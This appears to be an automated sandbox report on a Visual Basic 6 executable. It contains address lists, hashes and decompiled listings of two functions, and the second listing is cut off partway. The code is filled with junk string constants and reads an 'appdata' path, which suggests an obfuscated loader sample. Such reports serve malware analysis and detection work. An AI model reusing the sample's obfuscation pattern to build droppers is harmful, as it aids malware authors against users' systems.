0x00401c4e
0x00401c50
0x00401c52
0x00401c54
0x00401c56
0x00401c58
0x00401c5a
0x00401c5c
0x00401c5e
0x00401c60
0x00401c62
0x00401c64
0x00401c66
0x00401c68
0x00401c6a
0x00401c6c
0x00401c6e
0x00401c70
0x00401c72
0x00401c74
0x00401c76
0x00401c78
0x00401c7a
0x00401c7c
0x00401c7e
0x00401c80
0x00401c82
0x00401c84
0x00401c86
0x00401c88
0x00401c8a
0x00401c8c
0x00401c8e
0x00401c90
0x00401c92
0x00401c94
0x00401c96
0x00401c98
0x00401c9a
0x00401c9c
0x00401c9e
0x00401ca0
0x00401ca2
0x00401ca4
0x00401ca6
0x00401ca8
0x00401caa
0x00401cac
0x00401cae
0x00401cb0
0x00401cb1
0x00401cb3
0x00401cb9
0x00401cbb
0x00401cbd
0x00401cc1
0x00401cc4
0x00401cc6
0x00401cc8
0x00401cca
0x00401ccb
0x00401cce
0x00401ccf
0x00401cd1
0x00401cd4
0x00401cd6
0x00401cd8
0x00401cda
0x00401cdc
0x00401cde
0x00401ce0
0x00401ce2
0x00401ce4
0x00401ce6
0x00401ce8
0x00401cea
0x00401cec
0x00401cee
0x00401cf0
0x00401cf2
0x00401cf4
0x00401cf6
0x00401cf8
0x00401cfa
0x00401cfc
0x00401cfe
0x00401d00
0x00401d02
0x00401d04
0x00401d06
0x00401d08
0x00401d0a
0x00401d0c
0x00401d0e
0x00401d10
0x00401d12
0x00401d14
0x00401d16
0x00401d18
0x00401d1a
0x00401d1c
0x00401d1e
0x00401d20
0x00401d22
0x00401d24
0x00401d26
0x00401d28
0x00401d2a
0x00401d2c
0x00401d2e
0x00401d30
0x00401d32
0x00401d34
0x00401d36
0x00401d38
0x00401d3a
0x00401d3c
0x00401d3e
0x00401d40
0x00401d42
0x00401d44
0x00401d46
0x00401d48
0x00401d4a
0x00401d4c
0x00401d4e
0x00401d50
0x00401d52
0x00401d54
0x00401d56
0x00401d58
0x00401d5a
0x00401d5c
0x00401d5e
0x00401d60
0x00401d62
0x00401d64
0x00401d66
0x00401d68
0x00401d6a
0x00401d6c
0x00401d6e
0x00401d70
0x00401d72
0x00401d74
0x00401d76
0x00401d78
0x00401d7a
0x00401d7c
0x00401d7e
0x00401d80
0x00401d82
0x00401d84
0x00401d86
0x00401d88
0x00401d8a
0x00401d8c
0x00401d8e
0x00401d90
0x00401d92
0x00401d94
0x00401d96
0x00401d98
0x00401d9a
0x00401d9c
0x00401d9e
0x00401da0
0x00401da2
0x00401da4
0x00401da6
0x00401da8
0x00401daa
0x00401dac
0x00401dae
0x00401db0
0x00401db2
0x00401db4
0x00401db6
0x00401db8
0x00401dba
0x00401dbc
0x00401dbe
0x00401dc0
0x00401dc2
0x00401dc4
0x00401dc6
0x00401dc8
0x00401dca
0x00401dcc
0x00401dce
0x00401dd0
0x00401dd2
0x00401dd4
0x00401dd6
0x00401dd8
0x00401dda
0x00401ddc
0x00401dde
0x00401de0
0x00401de2
0x00401de4
0x00401de6
0x00401de8
0x00401dea
0x00401dec
0x00401dee
0x00401df0
0x00401df2
0x00401df4
0x00401df6
0x00401df8
0x00401dfa
0x00401dfc
0x00401dfe
0x00401e00
0x00401e02
0x00401e04
0x00401e06
0x00401e08
0x00401e0a
0x00401e0c
0x00401e0e
0x00401e10
0x00401e12
0x00401e14
0x00401e16
0x00401e18
0x00401e1a
0x00401e1c
0x00401e1e
0x00401e20
0x00401e22
0x00401e24
0x00401e26
0x00401e28
0x00401e2a
0x00401e2c
0x00401e2e
0x00401e30
0x00401e32
0x00401e34
0x00401e36
0x00401e38
0x00401e3a
0x00401e3c
0x00401e3e
0x00401e40
0x00401e42
0x00401e44
0x00401e46
0x00401e48
0x00401e4a
0x00401e4c
0x00401e4e
0x00401e50
0x00401e52
0x00401e54
0x00401e56
0x00401e58
0x00401e5a
0x00401e5c
0x00401e5e
0x00401e60
0x00401e62
0x00401e64
0x00401e66
0x00401e68
0x00401e6a
0x00401e6c
0x00401e6e
0x00401e70
0x00401e72
0x00401e74
0x00401e76
0x00401e78
0x00401e7a
0x00401e7c
0x00401e7e
0x00401e80
0x00401e82
0x00401e84
0x00401e86
0x00401e88
0x00401e8a
0x00401e8c
0x00401e8e
0x00401e90
0x00401e92
0x00401e94
0x00401e96
0x00401e98
0x00401e9a
0x00401e9c
0x00401e9e
0x00401ea0
0x00401ea2
0x00401ea4
0x00401ea6
0x00401ea8
0x00401eaa
0x00401eac
0x00401eae
0x00401eb0
0x00401eb2
0x00401eb4
0x00401eb6
0x00401eb8
0x00401eba
0x00401ebc
0x00401ebe
0x00401ec0
0x00401ec2
0x00401ec4
0x00401ec6
0x00401ec8
0x00401eca
0x00401ecc
0x00401ece
0x00401ed0
0x00401ed2
0x00401ed4
0x00401ed6
0x00401ed8
0x00401eda
0x00401edc
0x00401ede
0x00401ee0
0x00401ee2
0x00401ee4
0x00401ee6
0x00401ee7
0x00401ee9
0x00401eeb
0x00401eed
0x00401eef
0x00401ef5
0x00401ef7
0x00401efb
0x00401efd
0x00401eff
0x00401f01
0x00401f03
0x00401f05
0x00401f08
0x00401f0a
0x00401f0b
0x00401f0d
0x00401f0f
0x00401f15
0x00401f17
0x00401f19
0x00401f1b
0x00401f1d
0x00401f1f
0x00401f23
0x00401f25
0x00401f27
0x00401f29
0x00401f2c
0x00401f2e
0x00401f30
0x00401f32
0x00401f33
0x00401f35
0x00401f37
0x00401f3b
0x00401f3d
0x00401f3f
0x00401f42
0x00401f43
0x00401f45
0x00401f47
0x00401f4b
0x00401f4d
0x00401f53
0x00401f5a
0x00401f5b
0x00401f5d
0x00401f5f
0x00401f61
0x00401f68
0x00401f69
0x00401f6c
0x00401f6d
0x00401f6f
0x00401f72
0x00401f75
0x00401f78
0x00401f7a
0x00401f7c
0x00401f7e
0x00401f80
0x00401f82
0x00401f84
0x00401f85
0x00401f86
0x00401f87
0x00401f8d
0x00401f90
0x00401f92
0x00401f94
0x00401f99
0x00401f9c
0x00401f9d
0x00401fa0
0x00401fa2
0x00401fa3
0x00401fa5
0x00401fa8
0x00401faa
0x00401fab
0x00401fad
0x00401fb0
0x00401fb1
0x00401fb4
0x00401fb4
0x00401fb8
0x00401fba
0x00401fbb
0x00401fbe
0x00401fbf
0x00401fc5
0x00401fc8
0x00401fcd
0x00401fd0
0x00401fd4
0x00401fd5
0x00401fd8
0x00401fd9
0x00401fd9
0x00401fd9
0x00401fdb
0x00401fde
0x00401fdf
0x00401fe2
0x00401fe3
0x00401fea
0x00401feb
0x00401fed
0x00401fef
0x00401ff3
0x00401ff5
0x00401ff6
0x00401ff7
0x00401ffa
0x00401ffb
0x00401ffe
0x00401fff
0x00402003
0x00402005
0x00402007
0x00402009
0x0040200b
0x0040200d
0x0040200f
0x00402011
0x00402013
0x00402015
0x00402017
0x00402019
0x0040201b
0x00402021
0x00402023
0x00402025
0x00402027
0x00402029
0x0040202b
0x0040202d
0x0040202f
0x00402031
0x00402033
0x00402035
0x00402037
0x00402039
0x0040203b
0x0040203d
0x0040203f
0x00402041
0x00402043
0x00402045
0x00402047
0x00402049
0x0040204b
0x0040204d
0x0040204f
0x00402051
0x00402053
0x00402055
0x00402057
0x00402059
0x0040205b
0x0040205d
0x0040205f
0x00402061
0x00402063
0x00402065
0x00402067
0x00402069
0x0040206b
0x0040206d
0x0040206f
0x00402071
0x00402073
0x00402075
0x00402077
0x00402079
0x0040207b
0x0040207d
0x0040207f
0x00402085
0x00402087
0x00402089
0x0040208a
0x0040208b
0x0040208d
0x0041dd7c
0x0041dd7d
0x0041dd7f
0x0041dd80
0x0041dd81
0x0041dd86
0x0041dd8c
0x0041dd8d
0x0041dd94
0x0041dd99
0x0041dd9e
0x0041dd9f
0x0041dda0
0x0041dda1
0x0041dda4
0x0041ddab
0x0041ddb0
0x0041ddb5
0x0041ddb8
0x0041ddb9
0x0041ddbe
0x0041ddc5
0x0041ddcc
0x0041ddcf
0x0041ddd0
0x0041ddd3
0x0041ddd4
0x0041ddd9
0x0041dde0
0x0041dde3
0x0041dde8
0x0041ddef
0x0041ddf1
0x0041ddf7
0x0041ddf9
0x0041ddfe
0x0041de03
0x0041de05
0x0041de08
0x0041de0d
0x0041de14
0x0041de31
0x0041de16
0x0041de16
0x0041de1b
0x0041de20
0x0041de25
0x0041de25
0x0041de41
0x0041de43
0x0041de49
0x0041de4d
0x0041de53
0x0041de5b
0x0041de5e
0x0041de60
0x0041de66
0x0041de6d
0x0041de8f
0x0041de8f
0x0041de8f
0x0041de6f
0x0041de6f
0x0041de71
0x0041de76
0x0041de7c
0x0041de82
0x0041de87
0x0041de87
0x0041de96
0x0041de99
0x0041de9f
0x0041dea6
0x0041deac
0x0041deb4
0x0041deba
0x0041debc
0x0041dec2
0x0041dec9
0x0041deee
0x0041deee
0x0041deee
0x0041decb
0x0041decb
0x0041ded0
0x0041ded5
0x0041dedb
0x0041dee1
0x0041dee6
0x0041dee6
0x0041def5
0x0041defc
0x0041df00
0x0041df03
0x0041df03
0x0041df08
0x0041df0d
0x0041df10
0x0041df15
0x0041df17
0x0041df1a
0x0041df1f
0x0041df21
0x0041df24
0x0041df29
0x0041df2a
0x0041df2f
0x0041df34
0x0041df36
0x0041df3a
0x0041df3c
0x0041df43
0x0041df46
0x0041df4b
0x0041df52
0x0041df54
0x0041df5a
0x0041df61
0x0041df68
0x0041df6b
0x0041df6e
0x0041df73
0x0041df76
0x0041df77
0x0041df7a
0x0041df7b
0x0041df80
0x0041df87
0x0041df8e
0x0041df91
0x0041df92
0x0041df95
0x0041df96
0x0041df99
0x0041df9a
0x0041df9f
0x0041dfa0
0x0041dfa5
0x0041dfa7
0x0041dfaa
0x0041dfaf
0x0041dfb0
0x0041dfb2
0x0041dfb4
0x0041dfb9
0x0041dfbe
0x0041dfc1
0x0041dfc6
0x0041dfc9
0x0041dfca
0x0041dfcd
0x0041dfce
0x0041dfd1
0x0041dfd2
0x0041dfd4
0x0041dfd9
0x0041dfdc
0x0041dfde
0x0041dfe1
0x0041dfe2
0x0041dfe4
0x0041dfe9
0x0041dfeb
0x0041dff0
0x0041dff5
0x0041dff8
0x0041dff9
0x0041dffe
0x0041e001
0x0041e002
0x0041e007
0x0041e009
0x0041e00c
0x0041e011
0x0041e014
0x0041e014
0x0041e019
0x0041e047
0x0041e04a
0x0041e04f
0x0041e052
0x0041e057
0x0041e05a
0x0041e05f
0x0041e062
0x0041e067
0x00401a5b
0x00401a5b
0x00401a62
0x00401a64
0x00401a69
0x00401a6a
0x00401a6a
0x00401a6c
0x00401a6c
0x00401a6d
0x00401a6e
0x00401a71
0x00401a72
0x00401a73
0x00401a75
0x00401a77
0x00401a79
0x00401a7b
0x00401a7d
0x00401a7f
0x00401a81
0x00401a83
0x00401a85
0x00401a87
0x00401a89
0x00401a8b
0x00401a8d
0x00401a8f
0x00401a91
0x00401a93
0x00401a95
0x00401a97
0x00401a99
0x00401a9b
0x00401a9d
0x00401a9f
0x00401aa5
0x00401aa7
0x00401aa9
0x00401aac
0x00401aad
0x00401aaf
0x00401aaf
0x00000000
0x00401aaf
0x00401a58
0x00401a56
0x00401a4b
0x00401a49
0x00401a42
0x0040193b
0x0040193b
0x0040193b
0x00000000

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040188D

Strings

VB5!6&*, xrefs: 004019C8, 00401888

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: b344f4b4e4f0dcdb9195128bcd78988da101233f58435bb07ba9a2fdbf2817d5
Instruction ID: c9fd10dba90da17dfd0b65ae3975065bc430cd2f57dc6279ad09ea6a8859824d
Opcode Fuzzy Hash: b344f4b4e4f0dcdb9195128bcd78988da101233f58435bb07ba9a2fdbf2817d5
Instruction Fuzzy Hash: FC41FDA144E3C05FD7038B748C762917FB0AE53204B1E90EBC8D1CF5A3D22C591AD7AA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 021DAA34, Relevance: 8.2, Strings: 6, Instructions: 676COMMON

Download Yara Rule

Strings

=mt, xrefs: 021DC3EF
iB, xrefs: 021DBFBF
iH,, xrefs: 021DAC73
f8@, xrefs: 021DAF59
ndKU, xrefs: 021DB33E
A\, xrefs: 021DB58C

Memory Dump Source

Source File: 00000000.00000002.778696939.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: =mt$A\$f8@$iB$iH,$ndKU
API String ID: 0-3678086259
Opcode ID: 77885b2702c04a51ce225823af00551d34a069ace933f4d0d6b63e50d1a11d89
Instruction ID: ef973e98442fe9a151335951d1a6c9226c9e027a7f0a69ef4d76ef7efad2d93a
Opcode Fuzzy Hash: 77885b2702c04a51ce225823af00551d34a069ace933f4d0d6b63e50d1a11d89
Instruction Fuzzy Hash: 4852DA72644389DFDB689F34C9457DABBB2FF95300F42852ADC9A9B214D3349A81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 021E39E4, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.778696939.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2fb808bbca96c27b3f58ca56f51039a3c29db1a1047deee3d701bf2e1de5a48
Instruction ID: 3ab80cc5eab66f1bf89c8b5bdf1fc1a458d8a8e9e2044454ff8bfd8e7ff92b27
Opcode Fuzzy Hash: c2fb808bbca96c27b3f58ca56f51039a3c29db1a1047deee3d701bf2e1de5a48
Instruction Fuzzy Hash: 0E913572984B969FDF34DE64CC957EB73B2BF84340F16812ADC5A9B204D3309A81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 021DDFFD, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.778696939.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f782e637a140c563e8ca50d7c28df1e96baf3314f84fb66c1d15fe3c541825d9
Instruction ID: e064ba99bf9418774c2d837c7500731fc417bcc1c23ddd516d8980637b02cfc2
Opcode Fuzzy Hash: f782e637a140c563e8ca50d7c28df1e96baf3314f84fb66c1d15fe3c541825d9
Instruction Fuzzy Hash: 7CA18A71184289DFCB789F61CD51BEE7BB2AF94340F05842EDC8AAB624D7305A81DF12

Uniqueness

Uniqueness Score: -1.00%

Function 021E2A85, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.778696939.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea498976beb1cadff4748d87b423262a2cc732f9b346fc29ad2eabaa94caed6f
Instruction ID: 4cc6083ae8a0c23cf25f300d386f1bab47b810f7302441f7d3f6694b7c21c3ae
Opcode Fuzzy Hash: ea498976beb1cadff4748d87b423262a2cc732f9b346fc29ad2eabaa94caed6f
Instruction Fuzzy Hash: CC018C76680A58CFDB34CF28C998ED973E6EFA4710F46449ADC0A9B650C770AE40CB55

Uniqueness

Uniqueness Score: -1.00%

Function 021DCF89, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.778696939.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ebdc862d74b4c5b8aeb6e9228852dd68de493c3fab228ca510d8ca756b6e446
Instruction ID: 4a13207abd2cca645004457e3e201ce3563417d1908bbfa4f42fbd95dd3f2f52
Opcode Fuzzy Hash: 9ebdc862d74b4c5b8aeb6e9228852dd68de493c3fab228ca510d8ca756b6e446
Instruction Fuzzy Hash: 9DC092B76019818FFF06CA0CC891B4073A1F715664B480AD0F022CB7E2E324ED01CA08

Uniqueness

Uniqueness Score: -1.00%

Function 021E3692, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.778696939.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 021E1E86, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.778696939.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00420F4D, Relevance: 82.5, APIs: 38, Strings: 9, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00420F4D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a20, void* _a24, void* _a28, signed int* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				signed int _v60;
				void* _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v112;
				char* _v136;
				intOrPtr _v144;
				char* _v152;
				char _v160;
				void* _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v188;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr* _v200;
				signed int _v204;
				signed int _v208;
				short _t125;
				short _t133;
				signed int _t136;
				signed int _t142;
				signed int _t147;
				void* _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t194;

				_t193 = _t192 - 0xc;
				 *[fs:0x0] = _t193;
				L00401540();
				_v16 = _t193;
				_v12 = 0x4014c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t190);
				L004017B6();
				L004017B6();
				L004017B6();
				L004017B6();
				 *_a32 =  *_a32 & 0x00000000;
				_push(0xbe);
				L00401756();
				L0040183A();
				_v88 = 0x19;
				_v96 = 2;
				_v188 = _v60;
				_v60 = _v60 & 0x00000000;
				_v72 = _v188;
				_v80 = 8;
				_push( &_v96);
				_push(0xf9);
				_push( &_v80);
				_push( &_v112);
				L0040168A();
				_v152 = L"monacanthid";
				_v160 = 0x8008;
				_push( &_v112);
				_t125 =  &_v160;
				_push(_t125);
				L00401660();
				_v164 = _t125;
				L00401846();
				_push( &_v112);
				_push( &_v96);
				_push( &_v80);
				_push(3);
				L00401840();
				_t194 = _t193 + 0x10;
				if(_v164 != 0) {
					_push(_v32);
					_push(L"Pollenate4");
					L00401696();
					L0040183A();
					_push(0xa7);
					_push(L"Apokreos");
					L0040162A();
					L0040183A();
					_v192 = _v60;
					_v60 = _v60 & 0x00000000;
					_v72 = _v192;
					_v80 = 8;
					_push(0xea);
					_push( &_v80);
					_push( &_v96);
					L00401624();
					_push( &_v96);
					L00401834();
					L0040183A();
					L00401846();
					_push( &_v96);
					_push( &_v80);
					_push(2);
					L00401840();
					_t194 = _t194 + 0xc;
				}
				_v136 = L"12/12/12";
				_v144 = 8;
				L0040184C();
				_push( &_v80);
				_push( &_v96);
				L004015E8();
				_v152 = 0xc;
				_v160 = 0x8002;
				_push( &_v96);
				_t133 =  &_v160;
				_push(_t133);
				L00401738();
				_v164 = _t133;
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L00401840();
				_t136 = _v164;
				if(_t136 != 0) {
					_push(L"Sjkler7");
					_push(L"Antagonistiske");
					_push(L"ADDEDLY");
					_push(L"RESELLS");
					L00401822();
					if( *0x4223c0 != 0) {
						_v200 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40259c);
						L004017CE();
						_v200 = 0x4223c0;
					}
					_v164 =  *_v200;
					_t142 =  *((intOrPtr*)( *_v164 + 0x14))(_v164,  &_v64);
					asm("fclex");
					_v168 = _t142;
					if(_v168 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40258c);
						_push(_v164);
						_push(_v168);
						L004017C8();
						_v204 = _t142;
					}
					_v172 = _v64;
					_t147 =  *((intOrPtr*)( *_v172 + 0x110))(_v172,  &_v60);
					asm("fclex");
					_v176 = _t147;
					if(_v176 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x4025ac);
						_push(_v172);
						_push(_v176);
						L004017C8();
						_v208 = _t147;
					}
					_t136 = _v60;
					_v196 = _t136;
					_v60 = _v60 & 0x00000000;
					L0040183A();
					L004017C2();
				}
				L004017B6();
				_push(0x421320);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t136;
			}

0x00420f50
0x00420f5f
0x00420f6b
0x00420f73
0x00420f76
0x00420f7d
0x00420f8c
0x00420f95
0x00420fa0
0x00420fab
0x00420fb6
0x00420fbe
0x00420fc1
0x00420fc6
0x00420fd0
0x00420fd5
0x00420fdc
0x00420fe6
0x00420fec
0x00420ff6
0x00420ff9
0x00421003
0x00421004
0x0042100c
0x00421010
0x00421011
0x00421016
0x00421020
0x0042102d
0x0042102e
0x00421034
0x00421035
0x0042103a
0x00421044
0x0042104c
0x00421050
0x00421054
0x00421055
0x00421057
0x0042105c
0x00421068
0x0042106e
0x00421071
0x00421076
0x00421080
0x00421085
0x0042108a
0x0042108f
0x00421099
0x004210a1
0x004210a7
0x004210b1
0x004210b4
0x004210bb
0x004210c3
0x004210c7
0x004210c8
0x004210d0
0x004210d1
0x004210db
0x004210e3
0x004210eb
0x004210ef
0x004210f0
0x004210f2
0x004210f7
0x004210f7
0x004210fa
0x00421104
0x00421117
0x0042111f
0x00421123
0x00421124
0x00421129
0x00421133
0x00421140
0x00421141
0x00421147
0x00421148
0x0042114d
0x00421157
0x0042115b
0x0042115c
0x0042115e
0x00421166
0x0042116f
0x00421175
0x0042117a
0x0042117f
0x00421184
0x00421189
0x00421195
0x004211b2
0x00421197
0x00421197
0x0042119c
0x004211a1
0x004211a6
0x004211a6
0x004211c4
0x004211dc
0x004211df
0x004211e1
0x004211ee
0x00421210
0x004211f0
0x004211f0
0x004211f2
0x004211f7
0x004211fd
0x00421203
0x00421208
0x00421208
0x0042121a
0x00421232
0x00421238
0x0042123a
0x00421247
0x0042126c
0x00421249
0x00421249
0x0042124e
0x00421253
0x00421259
0x0042125f
0x00421264
0x00421264
0x00421273
0x00421276
0x0042127c
0x00421289
0x00421291
0x00421291
0x0042129e
0x004212a3
0x004212ea
0x004212f2
0x004212fa
0x00421302
0x0042130a
0x00421312
0x0042131a
0x0042131f

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420F6B
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420F95
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420FA0
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420FAB
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420FB6
#525.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420FC6
__vbaStrMove.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420FD0
#629.MSVBVM60(?,00000008,000000F9,00000002), ref: 00421011
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00421035
__vbaFreeStr.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00421044
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?,00008008,?), ref: 00421057
__vbaStrCat.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00421076
__vbaStrMove.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00421080
#514.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 0042108F
__vbaStrMove.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00421099
#513.MSVBVM60(?,00000008,000000EA), ref: 004210C8
__vbaStrVarMove.MSVBVM60(?,?,00000008,000000EA), ref: 004210D1
__vbaStrMove.MSVBVM60(?,?,00000008,000000EA), ref: 004210DB
__vbaFreeStr.MSVBVM60(?,?,00000008,000000EA), ref: 004210E3
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000EA), ref: 004210F2
__vbaVarDup.MSVBVM60 ref: 00421117
#542.MSVBVM60(?,?), ref: 00421124
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00421148
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0042115E
#690.MSVBVM60(RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00421189
__vbaNew2.MSVBVM60(0040259C,004223C0,RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 004211A1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 00421203
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000110), ref: 0042125F
__vbaStrMove.MSVBVM60(00000000,?,004025AC,00000110), ref: 00421289
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,00000110), ref: 00421291
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042129E
__vbaFreeStr.MSVBVM60(00421320,?,?,?,?,?,?,00401546), ref: 004212EA
__vbaFreeStr.MSVBVM60(00421320,?,?,?,?,?,?,00401546), ref: 004212F2
__vbaFreeStr.MSVBVM60(00421320,?,?,?,?,?,?,00401546), ref: 004212FA
__vbaFreeStr.MSVBVM60(00421320,?,?,?,?,?,?,00401546), ref: 00421302

Strings

Sjkler7, xrefs: 00421175
monacanthid, xrefs: 00421016
Apokreos, xrefs: 0042108A
12/12/12, xrefs: 004210FA
ADDEDLY, xrefs: 0042117F
Antagonistiske, xrefs: 0042117A
RESELLS, xrefs: 00421184
DIVARICATE, xrefs: 00421296
Pollenate4, xrefs: 00421071

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$Copy$List$CheckHresult$#513#514#525#542#629#690ChkstkNew2
String ID: 12/12/12$ADDEDLY$Antagonistiske$Apokreos$DIVARICATE$Pollenate4$RESELLS$Sjkler7$monacanthid
API String ID: 3384239285-254499488
Opcode ID: 9c19e45f961192f5f7bc2494ddfd9e4e83427c18c294af48723a9f3d1aeb726c
Instruction ID: d4a2817e9825debda5ef056418d1bad8ca9cad3fb0e65083fc5ad7ac659b483c
Opcode Fuzzy Hash: 9c19e45f961192f5f7bc2494ddfd9e4e83427c18c294af48723a9f3d1aeb726c
Instruction Fuzzy Hash: B7A1D671E00218AFDB10EF91D886BDEB7B8AF14304F5081AAF505B71A1EB785A49CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041F8EE, Relevance: 68.4, APIs: 32, Strings: 7, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041F8EE(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				short _v28;
				short _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				char _v64;
				intOrPtr _v72;
				char _v80;
				char _v96;
				char _v112;
				char* _v136;
				intOrPtr _v144;
				intOrPtr _v168;
				char _v176;
				void* _v180;
				short _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				intOrPtr* _v204;
				signed int _v208;
				signed int _v212;
				signed int _t90;
				char* _t99;
				short _t100;
				char* _t104;
				signed int _t119;
				signed int _t124;
				intOrPtr _t154;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t154;
				L00401540();
				_v12 = _t154;
				_v8 = 0x4013a0;
				_v136 = L"appdata";
				_v144 = 8;
				L0040184C();
				_t90 =  &_v64;
				_push(_t90);
				L00401642();
				L0040183A();
				_push(_t90);
				_push(L"Picry");
				L0040172C();
				asm("sbb eax, eax");
				_v184 =  ~( ~( ~_t90));
				L00401846();
				L00401828();
				if(_v184 != 0) {
					_v136 = L"Langfredagene5";
					_v144 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L004016BA();
					_push( &_v80);
					L00401834();
					L0040183A();
					_push( &_v80);
					_push( &_v64);
					_push(2);
					L00401840();
